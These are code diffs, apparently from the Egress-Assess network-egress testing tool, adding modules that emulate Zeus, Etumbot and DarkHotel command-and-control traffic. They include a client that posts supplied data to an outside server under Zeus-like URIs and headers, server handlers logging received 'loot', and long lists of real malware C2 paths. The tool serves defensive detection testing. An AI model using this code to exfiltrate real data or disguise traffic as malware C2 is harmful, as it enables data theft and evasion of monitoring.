||||
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
|
||||
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
|
||||
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
|
||||
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
|
||||
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
|
||||
'/alumno309/images/secure.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/das.db',
|
||||
'/ta_images/tools.php', '/plank/panel/config.jpg',
|
||||
'/includes/database/http/config.jpg',
|
||||
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
|
||||
'/administrator/modules/mod_menu/help/config.jpg',
|
||||
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
|
||||
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
|
||||
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
|
||||
'/forum.php', '/config.php', '/wp-blog/gate.php',
|
||||
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
|
||||
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
|
||||
'/images/outl.jpg', '/images/smilies/raye.jpg',
|
||||
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
|
||||
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
|
||||
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
|
||||
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
|
||||
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
|
||||
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
|
||||
'/plugins/system/bot.exe', '/plugins/system/config.bin',
|
||||
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
|
||||
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
|
||||
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
|
||||
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
|
||||
'/katolog/thumbs/panel/config.jpg',
|
||||
'/katolog/thumbs/panel/gate.php']
|
||||
|
||||
def emulate(self, data_to_exfil=None):
|
||||
|
||||
# headers that are used in get requests
|
||||
zeus_headers = {
|
||||
"Accept": "*/*",
|
||||
"Connection": "Close",
|
||||
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
||||
"Pragma": "no-cache"
|
||||
}
|
||||
|
||||
# Iterate over get and post request 5 times
|
||||
for times_requested in xrange(1, 6):
|
||||
selected_domain = random.choice(self.domains)
|
||||
zeus_headers['Host'] = selected_domain
|
||||
first_uri = random.choice(self.uris)
|
||||
|
||||
get_request = urllib2.Request(
|
||||
"http://" + self.egress_server + first_uri,
|
||||
headers=zeus_headers)
|
||||
try:
|
||||
urllib2.urlopen(get_request)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to zeus data exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
select_post_uri = False
|
||||
while not select_post_uri:
|
||||
post_uri = random.choice(self.uris)
|
||||
if post_uri.endswith('.exe'):
|
||||
pass
|
||||
else:
|
||||
select_post_uri = True
|
||||
|
||||
# Determining which data is being sent out by agent
|
||||
if data_to_exfil is None:
|
||||
posted_data = random.choice(self.post_data)
|
||||
else:
|
||||
posted_data = {'zeus_data': data_to_exfil}
|
||||
|
||||
# UrlEncode and send the data out
|
||||
posted_data = urllib.urlencode(posted_data)
|
||||
post_req = urllib2.Request(
|
||||
"http://" + self.egress_server + post_uri, posted_data,
|
||||
headers=zeus_headers)
|
||||
|
||||
try:
|
||||
urllib2.urlopen(post_req)
|
||||
except urllib2.URLError:
|
||||
print "[*] Error: Cannot connect to putter zeus exfil server!"
|
||||
print "[*] Error: Possible firewall, or proxy prventing this?"
|
||||
sys.exit(1)
|
||||
|
||||
print "[*] INFO: Zeus C2 comms complete!"
|
||||
|
||||
return
|
|
@ -33,6 +33,14 @@ def cli_parser():
|
|||
protocols.add_argument("--ip", metavar="192.168.1.2", default=None,
|
||||
help="IP to extract data to.")
|
||||
|
||||
actors = parser.add_argument_group('Actor Emulation')
|
||||
actors.add_argument(
|
||||
"--actor", default=None, metavar="[zeus]",
|
||||
help="Emulate [actor] C2 comms to egress server.")
|
||||
actors.add_argument(
|
||||
"--list-actors", default=False, action='store_true',
|
||||
help="List all supported malware/APT group modules")
|
||||
|
||||
servers = parser.add_argument_group('Server Protocol Options')
|
||||
servers.add_argument(
|
||||
"--server", default=None, metavar='[http]',
|
||||
|
@ -74,19 +82,19 @@ def cli_parser():
|
|||
print "[*] Error: FTP or SFTP connections require \
|
||||
a username and password!".replace(' ', '')
|
||||
print "[*] Error: Please re-run and provide the required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if args.client and args.ip is None:
|
||||
print "[*] Error: You said to act like a client, but provided no ip"
|
||||
print "[*] Error: to connect to. Please re-run with required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if (args.client is not None) and (args.datatype is None) and (
|
||||
args.file is None):
|
||||
print "[*] Error: You need to tell Egress-Assess the type \
|
||||
of data to send!".replace(' ', '')
|
||||
print "[*] Error: to connect to. Please re-run with required info!"
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if (args.client is None and args.server is None and
|
||||
args.list_servers is None and args.list_clients is None and
|
||||
|
@ -95,7 +103,12 @@ def cli_parser():
|
|||
a server or client!".replace(' ', '')
|
||||
print "[*] Error: Please re-run and provide an action to perform!"
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
sys.exit(1)
|
||||
|
||||
if args.actor is not None and args.ip is None:
|
||||
print "[*] Error: You did not provide an IP to egress data to!"
|
||||
print "[*] Error: Please re-run and provide an ip!"
|
||||
sys.exit(1)
|
||||
|
||||
return args
|
||||
|
||||
|
|
|
@ -6,6 +6,8 @@ This is the conductor which controls everything
|
|||
|
||||
import glob
|
||||
import imp
|
||||
from commandcontrol.malware import *
|
||||
from commandcontrol.apt import *
|
||||
from protocols.servers import *
|
||||
from protocols.clients import *
|
||||
from datatypes import *
|
||||
|
@ -19,6 +21,7 @@ class Conductor:
|
|||
self.client_protocols = {}
|
||||
self.server_protocols = {}
|
||||
self.datatypes = {}
|
||||
self.actor_modules = {}
|
||||
|
||||
def load_client_protocols(self, command_line_object):
|
||||
for name in glob.glob('protocols/clients/*.py'):
|
||||
|
@ -27,7 +30,6 @@ class Conductor:
|
|||
self.client_protocols[name] = loaded_client_proto.Client(command_line_object)
|
||||
return
|
||||
|
||||
|
||||
def load_server_protocols(self, command_line_object):
|
||||
for name in glob.glob('protocols/servers/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
|
@ -41,3 +43,14 @@ class Conductor:
|
|||
loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.datatypes[name] = loaded_datatypes.Datatype(command_line_object)
|
||||
return
|
||||
|
||||
def load_actors(self, command_line_object):
|
||||
for name in glob.glob('commandcontrol/malware/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
|
||||
for name in glob.glob('commandcontrol/apt/*.py'):
|
||||
if name.endswith(".py") and ("__init__" not in name):
|
||||
loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name)
|
||||
self.actor_modules[name] = loaded_actors.Actor(command_line_object)
|
||||
return
|
||||
|
|
|
@ -4,7 +4,6 @@ This is the web client code
|
|||
|
||||
'''
|
||||
|
||||
import ssl
|
||||
import sys
|
||||
import urllib2
|
||||
|
||||
|
@ -24,15 +23,6 @@ class Client:
|
|||
self.file_transfer = cli_object.file
|
||||
|
||||
def transmit(self, data_to_transmit):
|
||||
# This restores the same behavior as before.
|
||||
try:
|
||||
_create_unverified_https_context = ssl._create_unverified_context
|
||||
except AttributeError:
|
||||
# Legacy Python that doesn't verify HTTPS certificates by default
|
||||
pass
|
||||
else:
|
||||
# Handle target environment that doesn't support HTTPS verification
|
||||
ssl._create_default_https_context = _create_unverified_https_context
|
||||
if not self.file_transfer:
|
||||
url = "https://" + self.remote_server + "/post_data.php"
|
||||
|
||||
|
|
|
@ -1,7 +1,11 @@
|
|||
import os
|
||||
import random
|
||||
import time
|
||||
from BaseHTTPServer import BaseHTTPRequestHandler
|
||||
from common import helpers
|
||||
from commandcontrol.apt import *
|
||||
from commandcontrol.malware import *
|
||||
from protocols.servers.serverlibs.web import malware_callbacks
|
||||
|
||||
|
||||
class GetHandler(BaseHTTPRequestHandler):
|
||||
|
@ -11,7 +15,59 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# should be performing GET requests Help from
|
||||
# http://pymotw.com/2/BaseHTTPServer/
|
||||
def do_GET(self):
|
||||
if self.path in malware_callbacks.malware_uris:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
elif self.path == malware_callbacks.etumbot_checkin:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(malware_callbacks.etumbot_checkin_response)
|
||||
|
||||
elif ((self.path.startswith(malware_callbacks.etumbot_uri) or self.path.startswith(malware_callbacks.etumbot_uri2)) and (self.path.endswith(malware_callbacks.etumbot_extensions) or self.path.endswith(malware_callbacks.etumbot_extensions2)) or self.path.startswith(malware_callbacks.etumbot_uri3) or self.path.startswith(malware_callbacks.etumbot_uri4) or self.path.startswith(malware_callbacks.etumbot_uri5)):
|
||||
# current directory
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write('etumbot just checked in here!\n')
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write(random.choice(malware_callbacks.encoded_response))
|
||||
|
||||
elif self.path == malware_callbacks.darkhotel_checkin:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DEXT8726.168.15.192')
|
||||
|
||||
elif self.path == malware_callbacks.darkhotel_checkin2:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DEXT87no')
|
||||
|
||||
elif self.path.startswith(malware_callbacks.darkhotel_uri):
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write('DarkHotel just checked in here!\n')
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
self.wfile.write('DKCheckin good')
|
||||
|
||||
else:
|
||||
# 404 since we aren't serving up any pages, only receiving data
|
||||
self.send_response(404)
|
||||
self.end_headers()
|
||||
|
@ -20,11 +76,6 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# handle post request
|
||||
def do_POST(self):
|
||||
|
||||
# Gather the Posted URI from the agent/browser
|
||||
# parsed_path = urlparse.urlparse(self.path)
|
||||
uri_posted = self.path
|
||||
uri_posted = uri_posted.replace("/", "")
|
||||
#incoming_ip = self.client_address[0]
|
||||
# current directory
|
||||
exfil_directory = os.path.join(helpers.ea_path(), "data")
|
||||
loot_path = exfil_directory + "/"
|
||||
|
@ -32,7 +83,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
# Info for this from -
|
||||
# http://stackoverflow.com/questions/13146064/simple-
|
||||
# python-webserver-to-save-file
|
||||
if uri_posted == "post_data.php":
|
||||
if self.path == "/post_data.php":
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
@ -56,7 +107,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write(screen_data)
|
||||
|
||||
elif uri_posted == "post_file.php":
|
||||
elif self.path == "/post_file.php":
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
|
@ -75,7 +126,7 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + file_name, 'wb') as cc_data_file:
|
||||
cc_data_file.write(file_data)
|
||||
|
||||
elif uri_posted == "posh_file.php":
|
||||
elif self.path == "/posh_file.php":
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
|
@ -91,6 +142,30 @@ class GetHandler(BaseHTTPRequestHandler):
|
|||
with open(loot_path + filename, 'wb') as cc_data_file:
|
||||
cc_data_file.write(data)
|
||||
|
||||
elif (self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris):
|
||||
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
|
||||
# Check to make sure the agent directory exists, and a loot
|
||||
# directory for the agent. If not, make them
|
||||
if not os.path.isdir(loot_path):
|
||||
os.makedirs(loot_path)
|
||||
|
||||
# Get the date info
|
||||
current_date = time.strftime("%m/%d/%Y")
|
||||
current_time = time.strftime("%H:%M:%S")
|
||||
screenshot_name = current_date.replace("/", "") +\
|
||||
"_" + current_time.replace(":", "") + "actor_data.txt"
|
||||
|
||||
# Read the length of the screenshot file being uploaded
|
||||
screen_length = self.headers['content-length']
|
||||
screen_data = self.rfile.read(int(screen_length))
|
||||
|
||||
# Write out the file
|
||||
with open(loot_path + screenshot_name, 'a') as cc_data_file:
|
||||
cc_data_file.write(screen_data)
|
||||
|
||||
# All other Post requests
|
||||
else:
|
||||
|
||||
|
|
|
@ -0,0 +1,208 @@
|
|||
'''
|
||||
|
||||
This file is for managing malware/APT callbacks
|
||||
|
||||
'''
|
||||
|
||||
malware_uris = [
|
||||
'/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin',
|
||||
'/jm32/includes/site/gate.php', '/mathew/config.jpg',
|
||||
'/docs/.docs/config.jpg', '/docs/.docs/do.php',
|
||||
'/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe',
|
||||
'/zeujuus/a/modules/config.bin',
|
||||
'/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/2HZG41Zw/bot.exe',
|
||||
'/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin',
|
||||
'/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php',
|
||||
'/zejius/5GPR0iy9/bot.exe',
|
||||
'/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg',
|
||||
'/past/gate.php', '/fan/base/config.jpg',
|
||||
'/wp-includes/pomo/panel/config.jpg',
|
||||
'/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg',
|
||||
'/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php',
|
||||
'/home/plugins/system/tmp/bot.scr',
|
||||
'/home/plugins/system/tmp/config.bin',
|
||||
'/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg',
|
||||
'/js/ssj/gate.php', '/site/tmp/xml/config.jpg',
|
||||
'/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php',
|
||||
'/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban',
|
||||
'/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg',
|
||||
'/vs/panel/gate.php', '/brand/server/file.php',
|
||||
'/brand/server/gate.php',
|
||||
'/wp-admin/css/colors/sunrise/admin/bot.exe',
|
||||
'/wp-admin/css/colors/sunrise/admin/config.bin',
|
||||
'/wp-admin/css/colors/sunrise/admin/secure.php',
|
||||
'/wp-content/themes/chagim/library/images/plates/bot.exe',
|
||||
'/wp-content/themes/chagim/library/images/plates/config.bin',
|
||||
'/wp-content/themes/chagim/library/images/plates/gate.php',
|
||||
'/images/burr_insurance001001.php', '/images/team/config.jpg',
|
||||
'/images/team/gate.php', '/test/config.jpg', '/test/gate.php',
|
||||
'/ray/server/file.php', '/ray/server/gate.php', '/capa.bin',
|
||||
'/capa.exe', '/secure.php', '/ral/30/config.bin',
|
||||
'/ral/30/secure.php', '/wp-admin/css/config.bin',
|
||||
'/wp-admin/css/gate.php', '/wp-admin/css/setup.exe',
|
||||
'/panel/config.jpg', '/panel/gate.php',
|
||||
'/wp-includes2/SimplePie/Net/page/config.jpg',
|
||||
'/wp-includes2/SimplePie/Net/page/gate.php',
|
||||
'/includes/.srv/srv/bot.exe',
|
||||
'/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php',
|
||||
'/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin',
|
||||
'/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg',
|
||||
'/images2/gate.php', '/wp-includes/ID3/config.jpg',
|
||||
'/wp-includes/ID3/gate.php', '/emman/panel/config.jpg',
|
||||
'/emman/panel/gate.php', '/xampp/img/escu.bin',
|
||||
'/xampp/img/escu.exe', '/xampp/img/secure.php',
|
||||
'/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin',
|
||||
'/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe',
|
||||
'/isai/modules/mod_upgrade/config.bin',
|
||||
'/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg',
|
||||
'/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php',
|
||||
'/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php',
|
||||
'/img/vg.php', '/components/com_file/file.php',
|
||||
'/components/com_file/gate.php', '/images/panel/config.jpg',
|
||||
'/images/panel/gate.php', '/wordpress/gate.php',
|
||||
'/wordpress/gree.jpg', '/media/.tmp/file.php',
|
||||
'/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin',
|
||||
'/modules/holl.exe', '/templates/admin/install/config.jpg',
|
||||
'/templates/admin/install/gate.php',
|
||||
'/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php',
|
||||
'/tmp/cp/config.jpg', '/tmp/cp/gate.php',
|
||||
'/tmp/install/config.jpg', '/tmp/install/gate.php',
|
||||
'/frank/panel/config.jpg', '/frank/panel/gate.php',
|
||||
'/tmp/configs/new/vg.php', '/meask/lite/file.php',
|
||||
'/meask/lite/gate.php', '/css/src/admin/config.jpg',
|
||||
'/css/src/admin/gate.php', '/js/admin/install/config.jpg',
|
||||
'/js/admin/install/gate.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/work.php',
|
||||
'/update/bot.exe', '/update/cfg.bin', '/update/gate.php',
|
||||
'/chopinschumann/ital.bin', '/chopinschumann/ital.exe',
|
||||
'/chopinschumann/secure.php', '/images/ital.bin',
|
||||
'/images/ital.exe', '/images/secure.php',
|
||||
'/compose/panel/bot.exe', '/compose/panel/config.bin',
|
||||
'/compose/panel/secure.php', '/fy97/panel/config.bin',
|
||||
'/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe',
|
||||
'/images/secure.php', '/components/com_joomla/plugin/config.jpg',
|
||||
'/components/com_joomla/plugin/gate.php',
|
||||
'/resource/css/config.bin', '/resource/css/secure.php',
|
||||
'/wp-content/upgrade/PANEL/config.jpg',
|
||||
'/wp-content/upgrade/PANEL/gate.php',
|
||||
'/wp-content/plugins/bcet56aoikqf52iu/food.php',
|
||||
'/Scripts/_notes/build/bot.exe',
|
||||
'/Scripts/_notes/build/config.bin',
|
||||
'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe',
|
||||
'/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php',
|
||||
'/KINS/panel/bot.exe', '/KINS/panel/config.jpg',
|
||||
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php',
|
||||
'/walex/files/bot.exe', '/walex/files/config.jpg',
|
||||
'/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin',
|
||||
'/e7/gate.php',
|
||||
'/wp-admin/css/colors/coffee/cat/server/config.jpg',
|
||||
'/wp-admin/css/colors/coffee/cat/server/gate.php',
|
||||
'/site/S/13897652/5112/file.php',
|
||||
'/site/S/13897652/5112/gate.php',
|
||||
'/images/js/osomo/panel/config.jpg',
|
||||
'/images/js/osomo/panel/gate.php',
|
||||
'/themes/panel/config.jp', '/themes/panel/gate.php',
|
||||
'/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wqwcqqw/sasasacw.php', '/images/server/file.php',
|
||||
'/images/server/gate.php', '/cache/lcitorg/config.bin',
|
||||
'/cache/lcitorg/gate.php', '/form/panel/config.jpg',
|
||||
'/form/panel/gate.php', '/backup/gate.php',
|
||||
'/backup/jera.jpg', '/images/file.php',
|
||||
'/images/js/panel/config.jpg', '/images/js/panel/gate.php',
|
||||
'/images/config.jpg', '/images/gate.php',
|
||||
'/slim-cita/helps/file.php', '/slim-cita/helps/gate.php',
|
||||
'/kin/panelz/config.jpg', '/kin/panelz/gate.php',
|
||||
'/image/Panel/config.jpg', '/folder/config.bin',
|
||||
'/folder/secure.php', '/plugins/panel/config.jpg',
|
||||
'/plugins/panel/gate.php',
|
||||
'/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php',
|
||||
'/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php',
|
||||
'/js/MOM/config.jpg', '/js/MOM/gate.php',
|
||||
'/lung/panel/config.jpg', '/wp/config.jpg',
|
||||
'/wp/gate.php', '/data/config.jpg', '/data/gate.php',
|
||||
'/templates/beez/bot.exe', '/templates/beez/config.bin',
|
||||
'/templates/beez/gate.php', '/wp-includes/css/new/config.jpg',
|
||||
'/wp-includes/css/new/gate.php',
|
||||
'/language/pdf_fonts/server/bot.exe',
|
||||
'/language/pdf_fonts/server/config.bin',
|
||||
'/language/pdf_fonts/server/gate.php', '/js/liscence.php',
|
||||
'/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php',
|
||||
'/Mix/valeg/bot.exe', '/Mix/valeg/config.bin',
|
||||
'/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php',
|
||||
'/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg',
|
||||
'/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg',
|
||||
'/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php',
|
||||
'/admin/b7.php', '/admin/file.php', '/amed/config.jpg',
|
||||
'/amed/gate.php', '/sadcxvbv/vdfbffddf.php',
|
||||
'/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php',
|
||||
'/percy/panel/config.jpg', '/percy/panel/gate.php',
|
||||
'/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png',
|
||||
'/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg',
|
||||
'/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg',
|
||||
'/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg',
|
||||
'/news/secure.php', '/news/vuan.bin', '/.id/file.php',
|
||||
'/.id/gate.php',
|
||||
'/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php',
|
||||
'/overopen/panel/config.bin', '/overopen/panel/secure.php',
|
||||
'/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php',
|
||||
'/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php',
|
||||
'/wp-comment/baba.jpg', '/wp-comment/gate.php',
|
||||
'/alumno309/images/base.bin', '/alumno309/images/base.exe',
|
||||
'/alumno309/images/secure.php',
|
||||
'/wp-content/plugins/wp-db-backup-made/das.db',
|
||||
'/ta_images/tools.php', '/plank/panel/config.jpg',
|
||||
'/includes/database/http/config.jpg',
|
||||
'/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php',
|
||||
'/administrator/modules/mod_menu/help/config.jpg',
|
||||
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin',
|
||||
'/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe',
|
||||
'/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php',
|
||||
'/forum.php', '/config.php', '/wp-blog/gate.php',
|
||||
'/wp-blog/mell.jpg', '/descargas/adm/gate.php',
|
||||
'/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php',
|
||||
'/images/outl.jpg', '/images/smilies/raye.jpg',
|
||||
'/images/kin/config.jpg', '/jaextmanager_data/rimm.bin',
|
||||
'/jaextmanager_data/secure.php', '/js/cssme/file.php',
|
||||
'/js/cssme/thread.php', '/mss/plugins/system/config.bin',
|
||||
'/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin',
|
||||
'/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot',
|
||||
'/images/secure.php', '/images/todo.bin', '/images/todo.exe',
|
||||
'/plugins/system/bot.exe', '/plugins/system/config.bin',
|
||||
'/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php',
|
||||
'/modules/mod_footer/tmpl/gate.php', '/modules/secure.php',
|
||||
'/modules/warp.bin', '/modules/warp.exe', '/file.php',
|
||||
'/gate.php', '/db1/config.jpg', '/db1/gate.php',
|
||||
'/katolog/thumbs/panel/config.jpg',
|
||||
'/katolog/thumbs/panel/gate.php', '/home/index.asp?typeid=13']
|
||||
|
||||
other_apt_uris = [
|
||||
'/search5', '/microsoft/errorpost/default.aspx?ID=',
|
||||
'/MicrosoftUpdate/ShellEX/KB', '/MicrosoftUpdate/WWRONG/KB',
|
||||
'/MicrosoftUpdate/GetFiles/KB', '/MicrosoftUpdate/GetUpdate/KB']
|
||||
|
||||
etumbot_checkin = '/home/index.asp/typeid=13'
|
||||
etumbot_checkin_response = 'AQAAAAAAAABlNjV3YjI0bjUAAAAAAAAAAAAAAG5FAVBvIz8hYk08ITI4BA0lMTBvBRx0NB18BndMcFMKQhR5PxxkQ3VnFEALeXA6C3RPBmJLHBBccHQINEl9I3kMUk0lOT4wCFgqD3khTjl5IEAqGzU_DmtUeEJBYSQHEiwRADteMEFjTw5oXgtjGkUxL14JPlwyYQQXPkVaQiAyUBEaJWlkOQEmZRoXZ10EN3RndH0kbEErew0NUklhFRlpNDJofS1hPQMCeWUvHSQPA2ZAPHEcCRkLPURbCC8bdTgIXXcIBhBbVlhjdB8iL2Y_TCNldTNjZkEvB0M5BWtaOkBALj4KIA5UBjhVPxhhSk1fAwdKKi8zdhl6TkthRUZAOQdICRgFEgY0dwpQNjtlQgR8DzM9N3NQBhteHgdwaVtycDZvS1Q3CTYhARI1GBMrWh1FQxcdQhV7MSx'
|
||||
etumbot_uri = '/history/'
|
||||
etumbot_uri2 = '/image/'
|
||||
etumbot_uri3 = '/article/30441/Review.asp?'
|
||||
etumbot_uri4 = '/manage/asp/item.asp?id='
|
||||
etumbot_uri5 = '/tech/s.asp?m='
|
||||
etumbot_extensions = '.jpg'
|
||||
etumbot_extensions2 = '.asp'
|
||||
|
||||
encoded_response = [
|
||||
'dGhpc2lzZ29pbmd0b2JlIGEgcmVhbGx5IGJpZyByZXNwb25zZSBob3BlZnVsbHkuICBXZSByZWFsbHkgd2FudCB0aGVyZSB0byBiZSBhIGxvdCBvZiBkYXRhIHNvIHRoYXQgSSBjYW4gc2ltbGF0ZSB0aGUgd2ViIHJlc3BvbnNlIGJlaW5nIEMyIGNvbW1hbmRzIGZyb20gdGhlIHV0dW1ib3Qgc2VydmVyLiAgSSBkbyBub3Qga25vdyB3aGF0IGlzIGdvaW5nIHRvIGhhcHBlbiwgYnV0IEkgd2lsbCBjb250aW51ZSB0byB0cnkgdG8gZGV2ZWxvcCBhIGxvdCBvZiBtYWx3YXJlIG1vZHVsZSBmb3IgZWdyZXNzLWFzc2Vzcy4gIGl0IGhhcyBiZWVuIGEgbG90IG9mIGZ1bg--',
|
||||
'SSBhbSBnb2luZyB0byBjb250aW51ZSB0byBkZXZlbG9wIGVncmVzcy1hc3Nlc3MgbW9kdWxlcyBhbmQgdGhpcyBpcyBnb2luZyB0byBiZSBvbmUgb2YgdGhlbS4gIFRoZSBpbml0aWFsIHJlbGVhc2UgZm9yIHRoZXNlIG1hbHdhcmUgYW5kIEFQVCBncm91cCBtb2R1bGVzIGlzIGdvaW5nIHRvIGJlIGF0IFNBTlMgSEFDS0ZFU1QgaW4gd2FzaGluZ3RvbiBEQy4gIElmIHlvdSBhcmUgd2FudGluZyB0byBnZXQgdGhlIGxhdGVzdCBlZ3Jlc3MtYXNzZXNzIG1vZHVsZXMgdGhlIGVhcmxpZXN0IHRoYXQgeW91IGNhbiwgYmUgc3VyZSB0byBnZXQgdGhlcmUgYXQgSEFDS0ZFU1QgYW5kIHNlZSBzdGV2ZSBhbmQgSSB0YWxrLg--',
|
||||
